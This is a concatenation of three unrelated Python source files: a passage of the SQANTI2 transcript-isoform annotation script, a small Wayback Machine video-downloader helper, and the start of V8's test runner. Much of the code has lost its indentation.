type = 'SINGLE_SAMPLE'
sep = '\t'
elif line.startswith('superPBID'):
type = 'MULTI_CHAIN'
sep = '\t'
elif line.startswith('id'):
type = 'MULTI_DEMUX'
sep = ','
else:
raise Exception("Unexpected count file format! Abort!")
f.seek(cur_pos)
break
reader = DictReader(f, delimiter=sep)
count_header = reader.fieldnames
if type=='SINGLE_SAMPLE':
if 'count_fl' not in count_header:
print("Expected `count_fl` field in count file {0}. Abort!".format(fl_count_filename), file=sys.stderr)
sys.exit(-1)
d = dict((r['pbid'], r) for r in reader)
elif type=='MULTI_CHAIN':
d = dict((r['superPBID'], r) for r in reader)
flag_single_sample = False
elif type=='MULTI_DEMUX':
d = dict((r['id'], r) for r in reader)
flag_single_sample = False
else:
print("Expected pbid or superPBID as a column in count file {0}. Abort!".format(fl_count_filename), file=sys.stderr)
sys.exit(-1)
f.close()
if flag_single_sample: # single sample
for k,v in d.items():
fl_count_dict[k] = int(v['count_fl'])
else: # multi-sample
for k,v in d.items():
fl_count_dict[k] = {}
samples = list(v.keys())
for sample,count in v.items():
if sample not in ('superPBID', 'id'):
fl_count_dict[k][sample] = int(count) if count!='NA' else 0
samples.sort()
if type=='MULTI_CHAIN':
samples.remove('superPBID')
elif type=='MULTI_DEMUX':
samples.remove('id')
return samples, fl_count_dict
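# Illustrative sketch (not part of the original script): feeding FLcount_parser() a minimal,
# made-up demux-style count file. The file name, sample names and counts are placeholders.
def _example_FLcount_parser(tmp_path="example_fl_count.csv"):
    with open(tmp_path, "w") as f:
        f.write("id,sampleA,sampleB\n")
        f.write("PB.1.1,3,0\n")
    samples, fl_count = FLcount_parser(tmp_path)   # header starts with 'id' -> MULTI_DEMUX, comma-separated
    return samples, fl_count["PB.1.1"]["sampleA"]  # -> (['sampleA', 'sampleB'], 3)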
def run(args):
global outputClassPath
global outputJuncPath
outputClassPath, outputJuncPath = get_class_junc_filenames(args)
start3 = timeit.default_timer()
print("**** Parsing provided files....", file=sys.stdout)
print("Reading genome fasta {0}....".format(args.genome), file=sys.stdout)
# NOTE: can't use LazyFastaReader because inefficient. Bring the whole genome in!
genome_dict = dict((r.name, r) for r in SeqIO.parse(open(args.genome), 'fasta'))
## correction of sequences and ORF prediction (if gtf provided instead of fasta file, correction of sequences will be skipped)
orfDict = correctionPlusORFpred(args, genome_dict)
## parse reference id (GTF) to dicts
refs_1exon_by_chr, refs_exons_by_chr, junctions_by_chr, junctions_by_gene, start_ends_by_gene = reference_parser(args, list(genome_dict.keys()))
## parse query isoforms
isoforms_by_chr = isoforms_parser(args)
## Run indel computation if sam exists
# indelsJunc: dict of pbid --> list of junctions near indel (in Interval format)
# indelsTotal: dict of pbid --> total indels count
if os.path.exists(corrSAM):
(indelsJunc, indelsTotal) = calc_indels_from_sam(corrSAM)
else:
indelsJunc = None
indelsTotal = None
# isoform classification + intra-priming + id and junction characterization
isoforms_info = isoformClassification(args, isoforms_by_chr, refs_1exon_by_chr, refs_exons_by_chr, junctions_by_chr, junctions_by_gene, start_ends_by_gene, genome_dict, indelsJunc, orfDict)
print("Number of classified isoforms: {0}".format(len(isoforms_info)), file=sys.stdout)
write_collapsed_GFF_with_CDS(isoforms_info, corrGTF, corrGTF+'.cds.gff')
os.rename(corrGTF+'.cds.gff', corrGTF)
## RT-switching computation
print("**** RT-switching computation....", file=sys.stderr)
# RTS_info: dict of (pbid) -> list of RT junction. if RTS_info[pbid] == [], means all junctions are non-RT.
RTS_info = rts([outputJuncPath+"_tmp", args.genome, "-a"], genome_dict)
for pbid in isoforms_info:
if pbid in RTS_info and len(RTS_info[pbid]) > 0:
isoforms_info[pbid].RT_switching = "TRUE"
else:
isoforms_info[pbid].RT_switching = "FALSE"
## FSM classification
geneFSM_dict = defaultdict(lambda: [])
for iso in isoforms_info:
gene = isoforms_info[iso].geneName() # if multi-gene, returns "geneA_geneB_geneC..."
geneFSM_dict[gene].append(isoforms_info[iso].str_class)
fields_class_cur = FIELDS_CLASS
## FL count file
if args.fl_count:
if not os.path.exists(args.fl_count):
print("FL count file {0} does not exist!".format(args.fl_count), file=sys.stderr)
sys.exit(-1)
print("**** Reading Full-length read abundance files...", file=sys.stderr)
fl_samples, fl_count_dict = FLcount_parser(args.fl_count)
for pbid in fl_count_dict:
if pbid not in isoforms_info:
print("WARNING: {0} found in FL count file but not in input fasta.".format(pbid), file=sys.stderr)
if len(fl_samples) == 1: # single sample from PacBio
print("Single-sample PacBio FL count format detected.", file=sys.stderr)
for iso in isoforms_info:
if iso in fl_count_dict:
isoforms_info[iso].FL = fl_count_dict[iso]
else:
print("WARNING: {0} not found in FL count file. Assign count as 0.".format(iso), file=sys.stderr)
isoforms_info[iso].FL = 0
else: # multi-sample
print("Multi-sample PacBio FL count format detected.", file=sys.stderr)
fields_class_cur = FIELDS_CLASS + ["FL."+s for s in fl_samples]
for iso in isoforms_info:
if iso in fl_count_dict:
isoforms_info[iso].FL_dict = fl_count_dict[iso]
else:
print("WARNING: {0} not found in FL count file. Assign count as 0.".format(iso), file=sys.stderr)
isoforms_info[iso].FL_dict = defaultdict(lambda: 0)
else:
print("Full-length read abundance files not provided.", file=sys.stderr)
## Isoform expression information
if args.expression:
print("**** Reading Isoform Expression Information.", file=sys.stderr)
exp_dict = expression_parser(args.expression)
gene_exp_dict = {}
for iso in isoforms_info:
if iso not in exp_dict:
exp_dict[iso] = 0
print("WARNING: isoform {0} not found in expression matrix. Assigning TPM of 0.".format(iso), file=sys.stderr)
gene = isoforms_info[iso].geneName()
if gene not in gene_exp_dict:
gene_exp_dict[gene] = exp_dict[iso]
else:
gene_exp_dict[gene] = gene_exp_dict[gene]+exp_dict[iso]
else:
exp_dict = None
gene_exp_dict = None
print("Isoforms expression files not provided.", file=sys.stderr)
## Adding indel, FSM class and expression information
for iso in isoforms_info:
gene = isoforms_info[iso].geneName()
if exp_dict is not None and gene_exp_dict is not None:
isoforms_info[iso].geneExp = gene_exp_dict[gene]
isoforms_info[iso].isoExp = exp_dict[iso]
if len(geneFSM_dict[gene])==1:
isoforms_info[iso].FSM_class = "A"
elif "full-splice_match" in geneFSM_dict[gene]:
isoforms_info[iso].FSM_class = "C"
else:
isoforms_info[iso].FSM_class = "B"
if indelsTotal is not None:
for iso in isoforms_info:
if iso in indelsTotal:
isoforms_info[iso].nIndels = indelsTotal[iso]
else:
isoforms_info[iso].nIndels = 0
## Read junction files and create attributes per id
# Read the junction information to fill in several remaining unfilled fields in classification
# (1) "canonical": is "canonical" if all junctions are canonical, otherwise "non_canonical"
# (2) "bite": is TRUE if any of the junction "bite_junction" field is TRUE
reader = DictReader(open(outputJuncPath+"_tmp"), delimiter='\t')
fields_junc_cur = reader.fieldnames
sj_covs_by_isoform = defaultdict(lambda: []) # pbid --> list of total_cov for each junction so we can calculate SD later
for r in reader:
# only need to do assignment if:
# (1) the .canonical field is still "NA"
# (2) the junction is non-canonical
assert r['canonical'] in ('canonical', 'non_canonical')
if (isoforms_info[r['isoform']].canonical == 'NA') or \
(r['canonical'] == 'non_canonical'):
isoforms_info[r['isoform']].canonical = r['canonical']
if (isoforms_info[r['isoform']].bite == 'NA') or (r['bite_junction'] == 'TRUE'):
isoforms_info[r['isoform']].bite = r['bite_junction']
if r['indel_near_junct'] == 'TRUE':
if isoforms_info[r['isoform']].nIndelsJunc == 'NA':
isoforms_info[r['isoform']].nIndelsJunc = 0
isoforms_info[r['isoform']].nIndelsJunc += 1
# min_cov: min( total_cov[j] for each junction j in this isoform )
# min_cov_pos: the junction [j] that attributed to argmin(total_cov[j])
# min_sample_cov: min( sample_cov[j] for each junction in this isoform )
# sd_cov: sd( total_cov[j] for each junction j in this isoform )
if r['sample_with_cov'] != 'NA':
sample_with_cov = int(r['sample_with_cov'])
if (isoforms_info[r['isoform']].min_samp_cov == 'NA') or (isoforms_info[r['isoform']].min_samp_cov > sample_with_cov):
isoforms_info[r['isoform']].min_samp_cov = sample_with_cov
if r['total_coverage'] != 'NA':
total_cov = int(r['total_coverage'])
sj_covs_by_isoform[r['isoform']].append(total_cov)
if (isoforms_info[r['isoform']].min_cov == 'NA') or (isoforms_info[r['isoform']].min_cov > total_cov):
isoforms_info[r['isoform']].min_cov = total_cov
isoforms_info[r['isoform']].min_cov_pos = r['junction_number']
for pbid, covs in sj_covs_by_isoform.items():
isoforms_info[pbid].sd = pstdev(covs)
#### Printing output file:
print("**** Writing output files....", file=sys.stderr)
# sort isoform keys
iso_keys = list(isoforms_info.keys())
iso_keys.sort(key=lambda x: (isoforms_info[x].chrom,isoforms_info[x].id))
with open(outputClassPath, 'w') as h:
fout_class = DictWriter(h, fieldnames=fields_class_cur, delimiter='\t')
fout_class.writeheader()
for iso_key in iso_keys:
fout_class.writerow(isoforms_info[iso_key].as_dict())
# Now that RTS info is obtained, we can write the final junctions.txt
with open(outputJuncPath, 'w') as h:
fout_junc = DictWriter(h, fieldnames=fields_junc_cur, delimiter='\t')
fout_junc.writeheader()
for r in DictReader(open(outputJuncPath+"_tmp"), delimiter='\t'):
if r['isoform'] in RTS_info:
if r['junction_number'] in RTS_info[r['isoform']]:
r['RTS_junction'] = 'TRUE'
else:
r['RTS_junction'] = 'FALSE'
fout_junc.writerow(r)
## Generating report
if not args.skip_report:
print("**** Generating SQANTI2 report....", file=sys.stderr)
cmd = RSCRIPTPATH + " {d}/{f} {c} {j} {p}".format(d=utilitiesPath, f=RSCRIPT_REPORT, c=outputClassPath, j=outputJuncPath, p=args.doc)
        if subprocess.call(cmd, shell=True) != 0:
            print("ERROR running command: {0}".format(cmd), file=sys.stderr)
            sys.exit(-1)
stop3 = timeit.default_timer()
print("Removing temporary files....", file=sys.stderr)
os.remove(outputClassPath+"_tmp")
os.remove(outputJuncPath+"_tmp")
print("SQANTI2 complete in {0} sec.".format(stop3 - start3), file=sys.stderr)
def rename_isoform_seqids(input_fasta, force_id_ignore=False):
"""
Rename input isoform fasta/fastq, which is usually mapped, collapsed Iso-Seq data with IDs like:
PB.1.1|chr1:10-100|xxxxxx
to just being "PB.1.1"
:param input_fasta: Could be either fasta or fastq, autodetect.
    :return: path of the output fasta with cleaned-up sequence IDs
"""
type = 'fasta'
with open(input_fasta) as h:
if h.readline().startswith('@'): type = 'fastq'
f = open(input_fasta[:input_fasta.rfind('.')]+'.renamed.fasta', 'w')
for r in SeqIO.parse(open(input_fasta), type):
m1 = seqid_rex1.match(r.id)
m2 = seqid_rex2.match(r.id)
m3 = seqid_fusion.match(r.id)
if not force_id_ignore and (m1 is None and m2 is None and m3 is None):
print("Invalid input IDs! Expected PB.X.Y or PB.X.Y|xxxxx or PBfusion.X format but saw {0} instead. Abort!".format(r.id), file=sys.stderr)
sys.exit(-1)
if r.id.startswith('PB.') or r.id.startswith('PBfusion.'): # PacBio fasta header
newid = r.id.split('|')[0]
else:
raw = r.id.split('|')
if len(raw) > 4: # RefSeq fasta header
newid = raw[3]
else:
newid = r.id.split()[0] # Ensembl fasta header
f.write(">{0}\n{1}\n".format(newid, r.seq))
f.close()
return f.name
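# Illustrative sketch (not part of the original script): the ID cleanup that
# rename_isoform_seqids() applies to PacBio-style headers. The header string is made up.
def _example_clean_seqid(raw_id="PB.1.1|chr1:10-100|xxxxxx"):
    # PacBio branch: keep everything before the first '|'
    return raw_id.split('|')[0]  # -> "PB.1.1"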
class CAGEPeak:
def __init__(self, cage_bed_filename):
self.cage_bed_filename = cage_bed_filename
self.cage_peaks = defaultdict(lambda: IntervalTree()) # (chrom,strand) --> intervals of peaks
self.read_bed()
def read_bed(self):
for line in open(self.cage_bed_filename):
raw = line.strip().split()
chrom = raw[0]
start0 = int(raw[1])
end1 = int(raw[2])
strand = raw[5]
tss0 = int(raw[6])
self.cage_peaks[(chrom,strand)].insert(start0, end1, (tss0, start0, end1))
def find(self, chrom, strand, query, search_window=10000):
"""
        :param query: 0-based coordinate of the 5' end to query
:return: <True/False falls within a cage peak>, <nearest dist to TSS>
dist to TSS is 0 if right on spot
dist to TSS is + if downstream, - if upstream (watch for strand!!!)
"""
within_peak, dist_peak = False, 'NA'
for (tss0,start0,end1) in self.cage_peaks[(chrom,strand)].find(query-search_window, query+search_window):
if not within_peak:
within_peak, dist_peak = (start0<=query<end1), (query - tss0) * (-1 if strand=='-' else +1)
else:
d = (query - tss0) * (-1 if strand=='-' else +1)
if abs(d) < abs(dist_peak):
within_peak, dist_peak = (start0<=query<end1), d
return within_peak, dist_peak
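# Illustrative sketch (not part of the original script): what CAGEPeak.find() returns for a
# made-up peak and query, assuming the same IntervalTree helper used elsewhere in this file.
def _example_cage_peak(tmp_bed="example_cage.bed"):
    # minimal 7-column BED line: chrom, start, end, name, score, strand, TSS position
    with open(tmp_bed, "w") as f:
        f.write("chr1\t100\t200\tpeak1\t0\t+\t150\n")
    cage = CAGEPeak(tmp_bed)
    return cage.find("chr1", "+", 160)  # -> (True, 10): inside the peak, 10 bp downstream of its TSS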
class PolyAPeak:
def __init__(self, polya_bed_filename):
self.polya_bed_filename = polya_bed_filename
self.polya_peaks = defaultdict(lambda: IntervalTree()) # (chrom,strand) --> intervals of peaks
self.read_bed()
def read_bed(self):
for line in open(self.polya_bed_filename):
raw = line.strip().split()
chrom = raw[0]
start0 = int(raw[1])
end1 = int(raw[2])
strand = raw[5]
self.polya_peaks[(chrom,strand)].insert(start0, end1, (start0, end1))
def find(self, chrom, strand, query, search_window=100):
"""
        :param query: 0-based coordinate to query against the annotated polyA peaks
:return: <True/False falls within some distance to polyA>, distance to closest
+ if downstream, - if upstream (watch for strand!!!)
"""
assert strand in ('+', '-')
hits = self.polya_peaks[(chrom,strand)].find(query-search_window, query+search_window)
if len(hits) == 0:
return False, None
else:
s0, e1 = hits[0]
min_dist = query - s0
for s0, e1 in hits[1:]:
d = query - s0
if abs(d) < abs(min_dist):
min_dist = d
if strand == '-':
min_dist = -min_dist
return True, min_dist
def split_input_run(args):
if os.path.exists(SPLIT_ROOT_DIR):
print("WARNING: {0} directory already exists! Abort!".format(SPLIT_ROOT_DIR), file=sys.stderr)
sys.exit(-1)
else:
os.makedirs(SPLIT_ROOT_DIR)
if args.gtf:
recs = [r for r in collapseGFFReader(args.isoforms)]
n = len(recs)
chunk_size = n//args.chunks + (n%args.chunks >0)
split_outs = []
#pdb.set_trace()
for i in range(args.chunks):
if i*chunk_size >= n:
break
d = os.path.join(SPLIT_ROOT_DIR, str(i))
os.makedirs(d)
f = open(os.path.join(d, os.path.basename(args.isoforms)+'.split'+str(i)), 'w')
for j in range(i*chunk_size, min((i+1)*chunk_size, n)):
write_collapseGFF_format(f, recs[j])
f.close()
split_outs.append((os.path.abspath(d), f.name))
else:
recs = [r for r in SeqIO.parse(open(args.isoforms),'fasta')]
n = len(recs)
chunk_size = n//args.chunks + (n%args.chunks >0)
split_outs = []
for i in range(args.chunks):
if i*chunk_size >= n:
break
d = os.path.join(SPLIT_ROOT_DIR, str(i))
os.makedirs(d)
f = open(os.path.join(d, os.path.basename(args.isoforms)+'.split'+str(i)), 'w')
for j in range(i*chunk_size, min((i+1)*chunk_size, n)):
SeqIO.write(recs[j], f, 'fasta')
f.close()
split_outs.append((os.path.abspath(d), f.name))
pools = []
for i,(d,x) in enumerate(split_outs):
print("launching worker on on {0}....".format(x))
args2 = copy.deepcopy(args)
args2.isoforms = x
args2.novel_gene_prefix = str(i)
args2.dir = d
args2.skip_report = True
p = Process(target=run, args=(args2,))
p.start()
pools.append(p)
for p in pools:
p.join()
return [d for (d,x) in split_outs]
def combine_split_runs(args, split_dirs):
"""
Combine .faa, .fasta, .gtf, .classification.txt, .junctions.txt
Then write out the PDF report
"""
corrGTF, corrSAM, corrFASTA, corrORF = get_corr_filenames(args)
outputClassPath, outputJuncPath = get_class_junc_filenames(args)
if not args.skipORF:
f_faa = open(corrORF, 'w')
f_fasta = open(corrFASTA, 'w')
f_gtf = open(corrGTF, 'w')
f_class = open(outputClassPath, 'w')
f_junc = open(outputJuncPath, 'w')
for i,split_d in enumerate(split_dirs):
_gtf, _sam, _fasta, _orf = get_corr_filenames(args, split_d)
_class, _junc = get_class_junc_filenames(args, split_d)
if not args.skipORF:
with open(_orf) as h: f_faa.write(h.read())
with open(_gtf) as h: f_gtf.write(h.read())
with open(_fasta) as h: f_fasta.write(h.read())
with open(_class) as h:
if i == 0:
f_class.write(h.readline())
else:
h.readline()
f_class.write(h.read())
with open(_junc) as h:
if i == 0:
f_junc.write(h.readline())
else:
h.readline()
f_junc.write(h.read())
f_fasta.close()
f_gtf.close()
f_class.close()
f_junc.close()
if not args.skipORF:
f_faa.close()
if not args.skip_report:
print("**** Generating SQANTI2 report....", file=sys.stderr)
cmd = RSCRIPTPATH + " {d}/{f} {c} {j} {p}".format(d=utilitiesPath, f=RSCRIPT_REPORT, c=outputClassPath, j=outputJuncPath, p=args.doc)
        if subprocess.call(cmd, shell=True) != 0:
            print("ERROR running command: {0}".format(cmd), file=sys.stderr)
            sys.exit(-1)
def main():
global utilitiesPath
#arguments
parser = argparse.ArgumentParser(description="Structural and Quality Annotation of Novel Transcript Isoforms")
    parser.add_argument('isoforms', help='\tIsoforms (FASTA/FASTQ or GTF format; FASTA/FASTQ by default, use --gtf for GTF input)')
parser.add_argument('annotation', help='\t\tReference annotation file (GTF format)')
parser.add_argument('genome', help='\t\tReference genome (Fasta format)')
parser.add_argument("--min_ref_len", type=int, default=200, help="\t\tMinimum reference transcript length (default: 200 bp)")
parser.add_argument("--force_id_ignore", action="store_true", default=False, help=argparse.SUPPRESS)
parser.add_argument("--aligner_choice", choices=['minimap2', 'deSALT', 'gmap'], default='minimap2')
parser.add_argument('--cage_peak', help='\t\tFANTOM5 Cage Peak (BED format, optional)')
parser.add_argument("--polyA_motif_list", help="\t\tRanked list of polyA motifs (text, optional)")
parser.add_argument("--polyA_peak", help='\t\tPolyA Peak (BED format, optional)')
parser.add_argument("--phyloP_bed", help="\t\tPhyloP BED for conservation score (BED, optional)")
parser.add_argument("--skipORF", default=False, action="store_true", help="\t\tSkip ORF prediction (to save time)")
parser.add_argument("--is_fusion", default=False, action="store_true", help="\t\tInput are fusion isoforms, must supply GTF as input using --gtf")
parser.add_argument('-g', '--gtf', help='\t\tUse when running SQANTI by using as input a gtf of isoforms', action='store_true')
parser.add_argument('-e','--expression', help='\t\tExpression matrix (supported: Kallisto tsv)', required=False)
parser.add_argument('-x','--gmap_index', help='\t\tPath and prefix of the reference index created by gmap_build. Mandatory if using GMAP unless -g option is specified.')
parser.add_argument('-t', '--cpus', default=10, type=int, help='\t\tNumber of threads used during alignment by aligners. (default: 10)')
parser.add_argument('-n', '--chunks', default=1, type=int, help='\t\tNumber of chunks to split SQANTI2 analysis in for speed up (default: 1).')
#parser.add_argument('-z', '--sense', help='\t\tOption that helps aligners know that the exons in you cDNA sequences are in the correct sense. Applicable just when you have a high quality set of cDNA sequences', required=False, action='store_true')
parser.add_argument('-o','--output', help='\t\tPrefix for output files.', required=False)
parser.add_argument('-d','--dir', help='\t\tDirectory for output files. Default: Directory where the script was run.', required=False)
parser.add_argument('-c','--coverage', help='\t\tJunction coverage files (provide a single file or a file pattern, ex: "mydir/*.junctions").', required=False)
parser.add_argument('-s','--sites', default="ATAC,GCAG,GTAG", help='\t\tSet of splice sites to be considered as canonical (comma-separated list of splice sites). Default: GTAG,GCAG,ATAC.', required=False)
parser.add_argument('-w','--window', default="20", help='\t\tSize of the window in the genomic DNA screened for Adenine content downstream of TTS', required=False, type=int)
parser.add_argument('--geneid', help='\t\tUse gene_id tag from GTF to define genes. Default: gene_name used to define genes', default=False, action='store_true')
parser.add_argument('-fl', '--fl_count', help='\t\tFull-length PacBio abundance file', required=False)
parser.add_argument("-v", "--version", help="Display program version number.", action='version', version='SQANTI2 '+str(__version__))
parser.add_argument("--skip_report", action="store_true", default=False, help=argparse.SUPPRESS)
args = parser.parse_args()
if args.is_fusion:
print("WARNING: Currently if --is_fusion is used, no ORFs will be predicted.", file=sys.stderr)
args.skipORF = True
if not args.gtf:
print("ERROR: if --is_fusion is on, must supply GTF as input and use --gtf!", file=sys.stderr)
sys.exit(-1)
if args.expression is not None:
if not os.path.exists(args.expression):
print("Expression file {0} not found. Abort!".format(args.expression), file=sys.stderr)
sys.exit(-1)
# path and prefix for output files
if args.output is None:
args.output = os.path.splitext(os.path.basename(args.isoforms))[0]
if args.dir is None:
args.dir = os.getcwd()
else:
args.dir = os.path.abspath(args.dir)
if os.path.isdir(args.dir):
print("WARNING: output directory {0} already exists. Overwriting!".format(args.dir), file=sys.stderr)
else:
os.makedirs(args.dir)
args.genome = os.path.abspath(args.genome)
if not os.path.isfile(args.genome):
print("ERROR: genome fasta {0} doesn't exist. Abort!".format(args.genome), file=sys.stderr)
sys.exit()
args.isoforms = os.path.abspath(args.isoforms)
if not os.path.isfile(args.isoforms):
print("ERROR: Input isoforms {0} doesn't exist. Abort!".format(args.isoforms), file=sys.stderr)
sys.exit()
if not args.gtf:
if args.aligner_choice == 'gmap':
if not os.path.isdir(os.path.abspath(args.gmap_index)):
print("GMAP index {0} doesn't exist! Abort.".format(args.gmap_index), file=sys.stderr)
sys.exit()
elif args.aligner_choice == 'deSALT':
if not os.path.isdir(os.path.abspath(args.gmap_index)):
print("deSALT index {0} doesn't exist! Abort.".format(args.gmap_index), file=sys.stderr)
sys.exit()
print("Cleaning up isoform IDs...", file=sys.stderr)
args.isoforms = rename_isoform_seqids(args.isoforms, args.force_id_ignore)
print("Cleaned up isoform fasta file written to: {0}".format(args.isoforms), file=sys.stderr)
args.annotation = os.path.abspath(args.annotation)
if not os.path.isfile(args.annotation):
print("ERROR: Annotation doesn't exist. Abort!".format(args.annotation), file=sys.stderr)
sys.exit()
#if args.aligner_choice == "gmap":
# args.sense = "sense_force" if args.sense else "auto"
#elif args.aligner_choice == "minimap2":
# args.sense = "f" if args.sense else "b"
## (Liz) turned off option for --sense, always TRUE
if args.aligner_choice == "gmap":
args.sense = "sense_force"
elif args.aligner_choice == "minimap2":
args.sense = "f"
#elif args.aligner_choice == "deSALT": #deSALT does not support this yet
# args.sense = "--trans-strand"
args.novel_gene_prefix = None
# Print out parameters so can be put into report PDF later
args.doc = os.path.join(os.path.abspath(args.dir), args.output+".params.txt")
print("Write arguments to {0}...".format(args.doc, file=sys.stdout))
with open(args.doc, 'w') as f:
f.write("Version\t" + __version__ + "\n")
f.write("Input\t" + os.path.basename(args.isoforms) + "\n")
f.write("Annotation\t" + os.path.basename(args.annotation) + "\n")
f.write("Genome\t" + os.path.basename(args.genome) + "\n")
f.write("Aligner\t" + args.aligner_choice + "\n")
f.write("FLCount\t" + (os.path.basename(args.fl_count) if args.fl_count is not None else "NA") + "\n")
f.write("Expression\t" + (os.path.basename(args.expression) if args.expression is not None else "NA") + "\n")
f.write("Junction\t" + (os.path.basename(args.coverage) if args.coverage is not None else "NA") + "\n")
f.write("CagePeak\t" + (os.path.basename(args.cage_peak) if args.cage_peak is not None else "NA") + "\n")
f.write("PolyA\t" + (os.path.basename(args.polyA_motif_list) if args.polyA_motif_list is not None else "NA") + "\n")
f.write("PolyAPeak\t" + (os.path.basename(args.polyA_peak) if args.polyA_peak is not None else "NA") + "\n")
f.write("IsFusion\t" + str(args.is_fusion) + "\n")
# Running functionality
print("**** Running SQANTI2...", file=sys.stdout)
if args.chunks == 1:
run(args)
else:
split_dirs = split_input_run(args)
combine_split_runs(args, split_dirs)
shutil.rmtree(SPLIT_ROOT_DIR)
if __name__ == "__main__":
main()
|
helpers.py
|
import re
import os
import urllib
import requests
from threading import Thread
canUseBS4 = True
valid_chars = '_.() abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&-+='
try:
from bs4 import BeautifulSoup
except ImportError as e:
canUseBS4 = False
# This function was written by NT_x86
def threadline(lines, numthreads, function):
    # distribute `lines` round-robin over `numthreads` buckets, one per worker thread
    threadlists = {}
    #make lists
    for x in range(numthreads):
        threadlists["thread"+str(x)] = []
    thrdnum = 0
    #append all the lines to lists
    for line in lines:
        threadlists["thread"+str(thrdnum)].append(line)
        if thrdnum == numthreads-1:
            thrdnum = 0
        else:
            thrdnum = thrdnum+1
#run the threads
for x in range(numthreads):
Thread(target=function, args=(threadlists["thread"+str(x)], )).start()
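# Illustrative sketch (not part of the original script): splitting a made-up list of URLs across
# two worker threads with threadline(). The worker function below is a placeholder.
def _example_threadline():
    def worker(lines):
        for line in lines:
            print("processing", line)
    threadline(["url1", "url2", "url3", "url4"], 2, worker)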
# Make a directory
def makeDir(dir):
if not os.path.exists(dir):
os.mkdir(dir)
# Filter file names
def getfilteredname(name):
fname = ''.join(c for c in name if c in valid_chars)
return fname
# Download a video
def downloadVideo(html, vidName, rootPath):
# Make paths
makeDir(f"{rootPath}\\Success")
makeDir(f"{rootPath}\\Failed")
makeDir(f"{rootPath}\\Videos")
soup = BeautifulSoup(html, features='html.parser')
vidTitle = soup.find("div", {"id": "video-title"})
vidName = f"{rootPath}\\Videos\\{vidName}.flv" if not vidTitle else f"{rootPath}\\Videos\\{getfilteredname(f'{vidName}-{vidTitle.getText()}')}.flv"
mobj = re.search(r"(?i)videoUrl\\x3d(.+?)\\x26", html)
if mobj is None:
print("FAILED TO FIND VIDEO")
else:
mediaURL = urllib.parse.unquote(mobj.group(1))
mediaURL = mediaURL.replace('\\x3d', '\x3d')
mediaURL = mediaURL.replace('\\x26', '\x26')
req = requests.get(f"http://web.archive.org/web/201208im_/{mediaURL}", allow_redirects=True)
URL = req.url + "\n"
if not URL in open(f"{rootPath}\Success\\Success.txt", "a+").read():
if req.status_code == 200:
print(f"Successfully downloaded {vidName}")
with open(f"{rootPath}\\Success\\Success.txt", "a+") as good:
good.write(URL)
with open(vidName, "wb+") as video:
video.write(req.content)
return True
else:
print(f"Failed to download {vidName} becasue: {req.status_code}")
if not URL in open(f"{rootPath}\\Failed\\{req.status_code}.txt", "w+").read():
with open(f"{rootPath}\\Failed\\{req.status_code}.txt", "a+") as stcode:
stcode.write(URL)
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import optparse
import os
from os.path import join, dirname, abspath, basename, isdir, exists
import platform
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
import utils
from Queue import Queue, Empty
VERBOSE = False
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases):
self.cases = cases
self.queue = Queue(len(cases))
for case in cases:
self.queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.crashed = 0
self.terminate = False
self.lock = threading.Lock()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[])
threads.append(thread)
thread.start()
try:
self.RunSingle()
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.terminate = True
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self):
while not self.terminate:
try:
test = self.queue.get_nowait()
except Empty:
return
case = test.case
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = time.time()
output = case.Run()
case.duration = (time.time() - start)
except BreakNowException:
self.terminate = True
except IOError, e:
assert self.terminate
return
if self.terminate:
return
self.lock.acquire()
if output.UnexpectedOutput():
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces and double quotes. We may need to escape more characters
# for this to work properly.
parts.append('"%s"' % part.replace('"', '\\"'))
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
